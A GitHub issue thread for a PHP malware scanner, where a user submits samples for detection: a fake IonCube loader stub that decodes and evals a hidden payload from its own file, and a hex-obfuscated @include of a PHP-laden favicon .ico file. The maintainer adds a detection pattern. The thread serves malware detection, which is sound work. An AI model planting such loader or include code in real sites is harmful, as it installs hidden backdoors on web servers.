new possible examples

[martiGIT]

Hi, first thanks for great piece of software, that saved many mandays :)

second I would like to share some examples that also should be considered as malware IonCube_loader - frequently malware is encrypted with this kind of popular encoder also this is code example:

<?php //000227
if (!extension_loaded('IonCube_loader')) {$__oc = strtolower(substr(php_uname(), 0, 3));$__ln = 'ioncube_loader_' . $__oc . '_' . substr(phpversion(), 0, 3) . (($__oc == 'win') ? '.dll' : '.so');if (function_exists('il_exec')) {return il_exec();}$__ln = '/ioncube/' . $__ln;$__ln = "preg_replace";$__oid = @fopen(__FILE__, 'rb');$__id = realpath('extension_dir');$__here = dirname(__FILE__);if (strlen($__id) > 1 && $__id[1] == ':') {$__id = str_replace('\\', '/', substr($__id, 2));$__here = str_replace('\\', '/', substr($__here, 2));}$__rd = "/" . str_repeat('/..', substr_count($__id, '/')) . $__here . '/';$__i = strlen($__rd);while ($__i--) {if ($__rd[$__i] == '/') {$__lp = substr($__rd, 0, $__i) . $__ln;if ($__lp = fread($__oid, @filesize(__FILE__))) {$__ln = pack("H*", $__ln("/[A-Z,\r,\n]/", "", substr($__lp, 0xc34-0x784)));break;}}}eval($__ln);return 0;} else {die('The file ' . __FILE__ . " is corrupted.\n");}if (function_exists('il_exec')) {return il_exec();}echo('Please check System Requirements on vendor site because the file <b>' . __FILE__ . '</b> requires the ionCube PHP Loader ' . basename($__ln) . ' to be installed by the site administrator.');return 0;

?>
ENCRYPTED CODE HERE

second, popular malwares includes .ico with php code inside, as part of php. I see that in rules are some include(_GET examples, but this particular example I find malware with this kind of linux find command:

find /var/www -name '*.ico' -exec grep -l "php" {} \; include example: @include "\x2fhome\x2fsite\x2f01_2\x3002/f\x61vico\x6e_e03\x3628.i\x63o"; following example is semiencoded path:

# echo -e "\x2fhome\x2fsite\x2f01_2\x3002/f\x61vico\x6e_e03\x3628.i\x63o";
/home/site/01_2002/favicon_e03628.ico

script could check if included file (ico) contains php and then report problem

[scr34m]

Nice to hear cheers!

I will think about IonCube, but thats a hard nut, I recently use it on some project, but time to time i found decoder so maybe I could find a decode solution (i have ioncube license to test encoded code somehow) could yo send the encrypted part in gist?

And for the .ico issue #36 maybe answer for your go there and place a 👍 :)

[martiGIT]

scan everything is not a good answer, because this will lead to many false positives and also - bad performance, include icofile encoded in such way (with path masking) is rather scheme that can be taken and use as pattern

please find gist link below to IonCube code

[scr34m]

Ohh i misunderstood the .ico pattern, i will make a pattern update for this kind of trick. Could you send me the file in gist as well.

[martiGIT]

this is the only part common that I mentioned before:

@include "\x2fhome\x2fsite\x2f01_2\x3002/f\x61vico\x6e_e03\x3628.i\x63o";

[scr34m]

Pattern added for this include string.

[scr34m]

Oh damn this file is not an ionCube encoded, there is an eval: $__lp = fread($__oid, @filesize(__FILE__))) {$__ln = pack("H*", $__ln("/[A-Z,\r,\n]/", "", substr($__lp, 0xb39-0x689))); so we are okay because we detect it.

[scr34m]

And any way this file seems corrupted payload: "pack(): Type H: illegal hex digit" and i found an analysis here https://www.sitelock.com/blog/2018/02/fake-ioncube-malware/